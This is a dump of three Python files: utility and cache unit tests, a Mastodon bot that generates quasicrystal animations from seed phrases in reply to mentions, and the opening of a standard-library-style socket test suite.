self.assertEqual(util.to_list({'a': 1}), ['a'])
def test_new_token(self):
a = util.new_token()
b = util.new_token()
self.assertNotEqual(a, b)
def test_iterable(self):
self.assertTrue(util.iterable(()))
self.assertTrue(util.iterable([]))
self.assertTrue(util.iterable({}))
self.assertFalse(util.iterable(''))
def test_filter_dict(self):
class LowerDict(util.FilterDict):
def __convert__(self, key):
if isinstance(key, str):
return key.lower()
return super().__convert__(key)
d = LowerDict(a=-1, A=0)
self.assertEqual(d['A'], 0)
self.assertEqual(d['a'], 0)
self.assertIn('A', d)
self.assertIn('a', d)
self.assertEqual(d.get('A'), 0)
self.assertEqual(d.get('a'), 0)
d.setdefault('a', -1)
self.assertEqual(d, {'a': 0})
d['B'] = 1
self.assertEqual(d['B'], 1)
self.assertEqual(d['b'], 1)
self.assertIn('B', d)
self.assertIn('b', d)
self.assertEqual(d.get('B'), 1)
self.assertEqual(d.get('b'), 1)
d.setdefault('b', -1)
self.assertEqual(d, {'a': 0, 'b': 1})
del d['b']
self.assertEqual(d, {'a': 0})
self.assertEqual(d.pop('a'), 0)
self.assertEqual(d, {})
d.update(A=0)
self.assertEqual(d, {'a': 0})
d.update(A=0, b=1)
self.assertEqual(d, {'a': 0, 'b': 1})
d[0] = 'a'
self.assertEqual(d, {'a': 0, 'b': 1, 0: 'a'})
x = d.copy()
self.assertIsInstance(x, LowerDict)
self.assertEqual(x, d)
x[0] = 'b'
self.assertEqual(d, {'a': 0, 'b': 1, 0: 'a'})
self.assertEqual(x, {'a': 0, 'b': 1, 0: 'b'})
class RWLockTestCase(AyameTestCase):
def test_rwlock(self):
def reader():
with lock.read():
self.assertGreater(lock._rcnt, 0)
self.assertEqual(lock._rwait, 0)
time.sleep(0.01)
def writer():
with lock.write():
self.assertEqual(lock._rcnt, -1)
self.assertEqual(lock._rwait, 0)
time.sleep(0.01)
lock = util.RWLock()
for _ in range(10):
thr = threading.Thread(target=random.choice((reader, writer)))
thr.daemon = True
thr.start()
time.sleep(0.01)
time.sleep(0.17)
self.assertEqual(lock._rcnt, 0)
self.assertEqual(lock._rwait, 0)
self.assertEqual(threading.active_count(), 1)
def test_release(self):
lock = util.RWLock()
with self.assertRaises(RuntimeError):
lock.release_read()
with self.assertRaises(RuntimeError):
lock.release_write()
class LRUCacheTestCase(AyameTestCase):
def lru_cache(self, n):
c = LRUCache(n)
for i in range(n):
c[chr(ord('a') + i)] = i + 1
return c
def test_lru_cache(self):
c = LRUCache(3)
self.assertEqual(c.cap, 3)
self.assertEqual(len(c), 0)
self.assertIsInstance(c, collections.abc.MutableMapping)
def test_repr(self):
c = self.lru_cache(0)
self.assertEqual(repr(c), 'LRUCache([])')
c = self.lru_cache(3)
self.assertEqual(repr(c), "LRUCache([('c', 3), ('b', 2), ('a', 1)])")
def test_set(self):
c = self.lru_cache(3)
self.assertEqual(len(c), 3)
self.assertEqual(list(c), ['c', 'b', 'a'])
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertIn('a', c)
self.assertIn('b', c)
self.assertIn('c', c)
self.assertEqual(list(c.keys()), ['c', 'b', 'a'])
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
c['c'] = 3.0
c['b'] = 2.0
c['a'] = 1.0
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1.0), ('b', 2.0), ('c', 3.0)])
self.assertEqual(c.evicted, [])
c['a'] = 1
c['b'] = 2
c['c'] = 3
c['d'] = 4
self.assertEqual(list(reversed(c)), ['b', 'c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1.0)])
self.assertEqual(c.setdefault('c', 0), 3)
self.assertEqual(c.setdefault('d', 0), 4)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(list(reversed(c)), ['c', 'd', 'e'])
self.assertEqual(list(c.items()), [('e', 5), ('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
def test_get(self):
c = self.lru_cache(3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
self.assertEqual(c['c'], 3)
self.assertEqual(c['b'], 2)
self.assertEqual(c['a'], 1)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.peek('a'), 1)
self.assertEqual(c.peek('b'), 2)
self.assertEqual(c.peek('c'), 3)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.get('a'), 1)
self.assertEqual(c.get('b'), 2)
self.assertEqual(c.get('c'), 3)
self.assertEqual(c.get('z', 26), 26)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
def test_del(self):
c = self.lru_cache(3)
del c['a']
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted, [('a', 1)])
c = self.lru_cache(3)
del c['b']
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
c = self.lru_cache(3)
del c['c']
self.assertEqual(list(reversed(c)), ['a', 'b'])
self.assertEqual(list(c.items()), [('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [('c', 3)])
c = self.lru_cache(3)
self.assertEqual(c.pop('b'), 2)
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
with self.assertRaises(KeyError):
c.pop('b')
self.assertIsNone(c.pop('b', None))
c = self.lru_cache(3)
n = len(c)
for i in range(1, n + 1):
self.assertEqual(len(c.popitem()), 2)
self.assertEqual(len(c), n - i)
self.assertEqual(len(c.evicted), i)
with self.assertRaises(KeyError):
c.popitem()
def test_resize(self):
c = self.lru_cache(3)
c.cap = 2
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1)])
c['d'] = 4
self.assertEqual(list(reversed(c)), ['c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
c.cap = 1
self.assertEqual(list(reversed(c)), ['d'])
self.assertEqual(list(c.items()), [('d', 4)])
self.assertEqual(c.evicted[2:], [('c', 3)])
c['e'] = 5
self.assertEqual(list(reversed(c)), ['e'])
self.assertEqual(list(c.items()), [('e', 5)])
self.assertEqual(c.evicted[3:], [('d', 4)])
c.cap = 0
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted[4:], [('e', 5)])
c.cap = -1
c['f'] = 6
c['g'] = 7
c['h'] = 8
c['i'] = 9
self.assertEqual(list(reversed(c)), ['f', 'g', 'h', 'i'])
self.assertEqual(list(c.items()), [('i', 9), ('h', 8), ('g', 7), ('f', 6)])
self.assertEqual(c.evicted[5:], [])
def test_clear(self):
c = self.lru_cache(3)
c.clear()
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted, [])
def test_update(self):
c = self.lru_cache(3)
with self.assertRaises(NotImplementedError):
c.update()
def test_copy(self):
self._test_dup(lambda c: c.copy())
def test_pickle(self):
self._test_dup(lambda c: pickle.loads(pickle.dumps(c)))
def _test_dup(self, dup):
r = self.lru_cache(3)
c = dup(r)
self.assertIsNot(c, r)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
class LRUCache(util.LRUCache):
def on_init(self):
super().on_init()
self.evicted = []
def on_evicted(self, k, v):
super().on_evicted(k, v)
self.evicted.append((k, v))
class LFUCacheTestCase(AyameTestCase):
def lfu_cache(self, n):
c = LFUCache(n)
for i in range(n):
c[chr(ord('a') + i)] = i + 1
return c
def test_lfu_cache(self):
c = LFUCache(3)
self.assertEqual(c.cap, 3)
self.assertEqual(len(c), 0)
self.assertIsInstance(c, collections.abc.MutableMapping)
with self.assertRaises(RuntimeError):
c._lfu()
def test_repr(self):
c = self.lfu_cache(0)
self.assertEqual(repr(c), 'LFUCache([])')
c = self.lfu_cache(3)
self.assertEqual(repr(c), "LFUCache([('c', 3), ('b', 2), ('a', 1)])")
def test_set(self):
c = self.lfu_cache(3)
self.assertEqual(len(c), 3)
self.assertEqual(list(c), ['c', 'b', 'a'])
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertIn('a', c)
self.assertIn('b', c)
self.assertIn('c', c)
self.assertEqual(list(c.keys()), ['c', 'b', 'a'])
self.assertEqual(list(c.values()), [3, 2, 1])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
c['c'] = 3.0
c['b'] = 2.0
c['a'] = 1.0
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1.0), ('b', 2.0), ('c', 3.0)])
self.assertEqual(c.evicted[0:], [('c', 3), ('b', 2), ('a', 1)])
c['a'] = 1
c['b'] = 2
c['c'] = 3
c['d'] = 4
self.assertEqual(list(reversed(c)), ['b', 'c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3), ('b', 2)])
self.assertEqual(c.evicted[3:], [('a', 1.0), ('b', 2.0), ('c', 3.0), ('a', 1)])
self.assertEqual(c.setdefault('d', 0), 4)
self.assertEqual(c.setdefault('e', 5), 5)
self.assertEqual(c.setdefault('c', 0), 3)
self.assertEqual(list(reversed(c)), ['e', 'd', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('d', 4), ('e', 5)])
self.assertEqual(c.evicted[7:], [('b', 2)])
def test_get(self):
c = self.lfu_cache(3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
self.assertEqual(c['c'], 3)
self.assertEqual(c['b'], 2)
self.assertEqual(c['a'], 1)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.peek('a'), 1)
self.assertEqual(c.peek('b'), 2)
self.assertEqual(c.peek('c'), 3)
self.assertEqual(list(reversed(c)), ['c', 'b', 'a'])
self.assertEqual(list(c.items()), [('a', 1), ('b', 2), ('c', 3)])
self.assertEqual(c.evicted, [])
self.assertEqual(c.get('a'), 1)
self.assertEqual(c.get('b'), 2)
self.assertEqual(c.get('c'), 3)
self.assertEqual(c.get('z', 26), 26)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
def test_del(self):
c = self.lfu_cache(3)
del c['a']
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted, [('a', 1)])
c = self.lfu_cache(3)
del c['b']
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
c = self.lfu_cache(3)
del c['c']
self.assertEqual(list(reversed(c)), ['a', 'b'])
self.assertEqual(list(c.items()), [('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [('c', 3)])
c = self.lfu_cache(3)
self.assertEqual(c.pop('b'), 2)
self.assertEqual(list(reversed(c)), ['a', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('a', 1)])
self.assertEqual(c.evicted, [('b', 2)])
with self.assertRaises(KeyError):
c.pop('b')
self.assertIsNone(c.pop('b', None))
c = self.lfu_cache(3)
n = len(c)
for i in range(1, n + 1):
self.assertEqual(len(c.popitem()), 2)
self.assertEqual(len(c), n - i)
self.assertEqual(len(c.evicted), i)
with self.assertRaises(KeyError):
c.popitem()
def test_resize(self):
c = self.lfu_cache(3)
c.cap = 2
self.assertEqual(list(reversed(c)), ['b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2)])
self.assertEqual(c.evicted[0:], [('a', 1)])
c['d'] = 4
self.assertEqual(list(reversed(c)), ['c', 'd'])
self.assertEqual(list(c.items()), [('d', 4), ('c', 3)])
self.assertEqual(c.evicted[1:], [('b', 2)])
c.cap = 1
self.assertEqual(list(reversed(c)), ['d'])
self.assertEqual(list(c.items()), [('d', 4)])
self.assertEqual(c.evicted[2:], [('c', 3)])
c['e'] = 5
self.assertEqual(list(reversed(c)), ['e'])
self.assertEqual(list(c.items()), [('e', 5)])
self.assertEqual(c.evicted[3:], [('d', 4)])
c.cap = 0
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted[4:], [('e', 5)])
c.cap = -1
c['f'] = 6
c['g'] = 7
c['h'] = 8
c['i'] = 9
self.assertEqual(list(reversed(c)), ['f', 'g', 'h', 'i'])
self.assertEqual(list(c.items()), [('i', 9), ('h', 8), ('g', 7), ('f', 6)])
self.assertEqual(c.evicted[5:], [])
def test_clear(self):
c = self.lfu_cache(3)
c.clear()
self.assertEqual(list(reversed(c)), [])
self.assertEqual(list(c.items()), [])
self.assertEqual(c.evicted, [])
def test_update(self):
c = self.lfu_cache(3)
with self.assertRaises(NotImplementedError):
c.update()
def test_copy(self):
self._test_dup(lambda c: c.copy())
def test_pickle(self):
self._test_dup(lambda c: pickle.loads(pickle.dumps(c)))
def _test_dup(self, dup):
f = self.lfu_cache(3)
c = dup(f)
self.assertIsNot(c, f)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
freq = c._head.next
self.assertEqual(freq.value, 1)
self.assertEqual(freq.len, 3)
self.assertEqual(c._head.prev.value, 1)
f = self.lfu_cache(3)
f['b']
f['c']
f['c']
c = dup(f)
self.assertIsNot(c, f)
self.assertEqual(c.cap, 3)
self.assertEqual(list(reversed(c)), ['a', 'b', 'c'])
self.assertEqual(list(c.items()), [('c', 3), ('b', 2), ('a', 1)])
self.assertEqual(c.evicted, [])
freq = c._head.next
self.assertEqual(freq.value, 1)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'a')
self.assertEqual(freq.head.value, 1)
freq = c._head.next.next
self.assertEqual(freq.value, 2)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'b')
self.assertEqual(freq.head.value, 2)
freq = c._head.next.next.next
self.assertEqual(freq.value, 3)
self.assertEqual(freq.len, 1)
self.assertEqual(freq.head.key, 'c')
self.assertEqual(freq.head.value, 3)
self.assertEqual(c._head.prev.value, 3)
class LFUCache(util.LFUCache):
def on_init(self):
super().on_init()
self.evicted = []
def on_evicted(self, k, v):
super().on_evicted(k, v)
self.evicted.append((k, v))
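# Usage sketch only, not exercised by the tests above. It assumes the
# util.LFUCache interface that the tests rely on: the constructor takes a
# capacity, __getitem__ bumps an entry's frequency, and exceeding `cap`
# triggers on_evicted() for the least-frequently-used entry.
def _example_eviction_hook():
    c = LFUCache(2)
    c['a'] = 1
    c['b'] = 2
    c['b']              # bump 'b', leaving 'a' as the least-frequently-used key
    c['c'] = 3          # over capacity: 'a' is evicted through on_evicted()
    return c.evicted    # expected (under the assumptions above): [('a', 1)]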
|
quasibot_mastoonly.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import sys
import random
import hashlib
import os
import atexit
import json
import traceback
import subprocess
from subprocess import call
from multiprocessing import Process, Queue, Value
from mastodon import Mastodon
with open("wordlist.txt", "r") as wordfile:
    wordlist = wordfile.readlines()
# Thread handler that adds users that @ the bot to a queue
replyQueue = Queue()
userCount = Value('i', 0)
def getReplies():
mastodon_api_2 = Mastodon(
api_base_url = "https://botsin.space/",
access_token = "mastodon_user.secret"
)
lastIdMastodon = None
initialRun = True
notedUsers = []
if os.path.exists('served.json'):
with open('served.json', 'r') as f:
notedUsers = json.load(f)
print("initial noted: " + str(notedUsers))
resetNoted = 0
while(True):
try:
replies = None
if lastIdMastodon == None:
replies = mastodon_api_2.notifications()
else:
print("Mastodon: Fetching replies since " + str(lastIdMastodon))
replies = mastodon_api_2.notifications(since_id = lastIdMastodon)
if len(replies) > 0:
lastIdMastodon = replies[0]["id"]
replies.reverse()
if(len(notedUsers) > 300):
notedUsers = notedUsers[len(notedUsers) - 300:]
for reply in replies:
if reply["type"] == "mention":
replyQueue.put((reply["status"]["account"]["acct"], "mastodon", str(reply["status"]["id"])))
if initialRun == False and not reply["status"]["account"]["acct"] in notedUsers:
allowFor = "some time"
if userCount.value > 7:
allowFor = "several hours"
if userCount.value == 0:
mastodon_api_2.status_reply(reply["status"], "I'll get right on it! Please allow for a few minutes for quasicrystal generation.", visibility="direct", untag=True)
else:
mastodon_api_2.status_reply(reply["status"], "Request received! The number of quasicrystals ahead of yours in the queue is around " + str(userCount.value) + ". Please allow for " + allowFor + " until your quasicrystal is ready.", visibility="direct", untag=True)
notedUsers.append(reply["status"]["account"]["acct"])
userCount.value += 1
print("Mastodon: New entry to reply queue: " + str(reply["status"]["account"]["acct"]))
except Exception as e:
print("Mastodon: Error in fetch replies: " + str(e))
time.sleep(60 * 5)
initialRun = False
if resetNoted != int(time.time() / (60.0*60.0*24.0)):
resetNoted = int(time.time() / (60.0*60.0*24.0))
notedUsers = []
time.sleep(60 * 5)
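# Helper shown for illustration only; the main loop further down inlines this
# exact expression when turning a seed phrase into the numeric seed that is
# passed to genquasi.py.
def phrase_to_seed(seedphrase):
    # sha1 the phrase, then fold the digest into a 32-bit-sized range
    # (4294967294 matches the modulus used inline below).
    return str(abs(int(hashlib.sha1(seedphrase.encode("utf-8")).hexdigest(), 16)) % 4294967294)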
Process(target = getReplies, daemon = True).start()
mastodon_api = Mastodon(
api_base_url = "https://botsin.space/",
access_token = "mastodon_user.secret"
)
servedUsers = []
nextSeeds = []
if os.path.exists("served.json"):
with open('served.json', 'r') as f:
servedUsers = json.load(f)
else:
# Clear user queue once on startup
time.sleep(10)
debugExclude = []
while(not replyQueue.empty()):
servedUser = replyQueue.get()
if not servedUser in debugExclude:
servedUsers.append(servedUser[0])
else:
print("Excluding " + str(servedUser) + " from initial queue wipe due to debug exclude")
nextSeeds.append(servedUser)
if os.path.exists("seeds.json"):
with open('seeds.json', 'r') as f:
nextSeeds = json.load(f)
def dump_state():
global servedUsers
global nextSeeds
print("Exiting, dumping state")
continueQueueGet = True
while continueQueueGet:
try:
print("Polling user queues.")
user = replyQueue.get(False)
except:
continueQueueGet = False
break
if user != None:
if not user[0] in servedUsers and not user in nextSeeds:
print("Appending " + str(user) + " to work queue.")
nextSeeds.append(user)
servedUsers.append(user[0])
if(len(servedUsers) > 300):
servedUsers = servedUsers[len(servedUsers) - 300:]
else:
continueQueueGet = False
with open('served.json', 'w') as f:
json.dump(servedUsers, f)
with open('seeds.json', 'w') as f:
json.dump(nextSeeds, f)
atexit.register(dump_state)
startTime = time.time()
pauseTime = 60 * 60 * 3
daySeed = 0
daySeedPhrase = ""
while(True):
checkWorkOnce = True
while(checkWorkOnce or len(nextSeeds) == 0 or (time.time() - startTime > pauseTime)):
userCount.value = len(nextSeeds)
checkWorkOnce = False
print("Checking new work...")
continueQueueGet = True
while continueQueueGet:
try:
print("Polling user queues.")
user = replyQueue.get(False)
except:
continueQueueGet = False
break
if user != None:
if not user[0] in servedUsers and not user in nextSeeds:
print("Appending " + str(user) + " to work queue.")
nextSeeds.append(user)
servedUsers.append(user[0])
if(len(servedUsers) > 300):
servedUsers = servedUsers[len(servedUsers) - 300:]
else:
continueQueueGet = False
if(time.time() - startTime > pauseTime):
print("Time for seed post, prepending to work queue...")
startTime = time.time()
nextSeeds = [("___GEN___", "both")] + nextSeeds
print("Sleeping until next check.")
time.sleep(60)
if daySeed != int(time.time() / (60.0*60.0*24.0)):
daySeed = int(time.time() / (60.0*60.0*24.0))
daySeedPhrase = ""
for i in range(0, 5):
daySeedPhrase += random.choice(wordlist).rstrip() + " "
print(daySeedPhrase + str(daySeed))
mastodon_api.status_post("It's a new day, and seeds have been changed! Todays lucky animals are: " + daySeedPhrase)
servedUsers = []
print("Current queue: " + str(nextSeeds))
userCount.value = len(nextSeeds)
seeduser = nextSeeds.pop(0)
seedphrase = seeduser[0] + " " + daySeedPhrase
userSpec = True
if(seeduser[0] == "___GEN___"):  # check the queue entry itself; seedphrase already has the day words appended
seedphrase = ""
userSpec = False
for i in range(0, 5):
seedphrase += random.choice(wordlist).rstrip() + " "
try:
seedhash = str(abs(int(hashlib.sha1(seedphrase.encode("utf-8")).hexdigest(), 16)) % 4294967294)
if not os.path.exists("done/" + seedhash + ".gif"):
print("seedphrase (no hash): " + seedphrase)
subprocess.call(["python3", "genquasi.py", seedhash])
subprocess.call(["ffmpeg", "-f", "lavfi", "-i", "anullsrc=channel_layout=stereo:sample_rate=44100", "-f", "gif", "-i", seedhash + ".gif", "-shortest", "-c:v", "libx264", "-b:v", "1M", "-pix_fmt", "yuv420p", "-c:a", "aac", seedhash + "_nl.mp4"])
listfile = open(seedhash + ".txt", "w")
for i in range(0, 10):
listfile.write("file '" + seedhash + "_nl.mp4'\n")
listfile.close()
subprocess.call(["ffmpeg", "-f", "concat", "-i", seedhash + ".txt", "-c:a", "copy", "-c:v", "copy", seedhash + ".mp4"])
subprocess.call(["mv", seedhash + ".gif", "done"])
subprocess.call(["mv", seedhash + ".mp4", "done"])
subprocess.call(["rm", seedhash + "_nl.mp4"])
subprocess.call(["rm", seedhash + ".txt"])
mediaFile = "done/" + seedhash + ".gif"
if os.path.getsize(mediaFile) > 1024 * 1024 * 3.9:
mediaFile = "done/" + seedhash + ".mp4"
except:
print("Encountered error during encode. Link-only tweet.")
mediaFile = None
if mediaFile is not None and not os.path.exists(mediaFile):
mediaFile = None
hqLink = "http://aka-san.halcy.de/quasi/" + seedhash + ".gif"
print("HQ link: " + hqLink)
# Post to Mastodon
try:
if seeduser[1] == "mastodon" or seeduser[1] == "both":
if mediaFile != None:
print("Mastodon media upload... mediafile is " + mediaFile)
mediaIdsMastodon = [mastodon_api.media_post(mediaFile)["id"]]
else:
mediaIdsMastodon = []
print("Tooting...")
if userSpec == False:
mastodon_api.status_post("seed phrase: " + seedphrase + "(HQ: " + hqLink + " )", media_ids = mediaIdsMastodon)
else:
reply_status = mastodon_api.status(seeduser[2])
mastodon_api.status_reply(reply_status, "here is your personal quasicrystal: (HQ: " + hqLink + " )", media_ids = mediaIdsMastodon, visibility="public", untag=True)
except:
print("Encountered error in post toot. Trying HQ only.")
e = sys.exc_info()[0]
print("Exception was: " + str(e))
traceback.print_exc()
try:
if userSpec == False:
mastodon_api.status_post("seed phrase: " + seedphrase + "(HQ: " + hqLink + " )")
else:
mastodon_api.status_post("@" + seedphrase + " here is your personal quasicrystal: (HQ: " + hqLink + " )")
except:
print("HQ only toot failed. Skipping.")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8-byte aligned because of the `frames` member (see
`struct can_frame` definition). Native (not standard) struct types must be used for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
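# Worked illustration (helper name and values invented): can_frame_fmt above
# packs a 32-bit CAN id, a one-byte data length code, three padding bytes and
# eight data bytes into a single 16-byte frame.
def _example_can_frame(can_id=0x123, data=b'\x11\x22\x33'):
    frame = struct.pack(SocketCANTest.can_frame_fmt,
                        can_id, len(data), data.ljust(8, b'\x00'))
    assert len(frame) == SocketCANTest.can_frame_size == 16
    return frame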
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
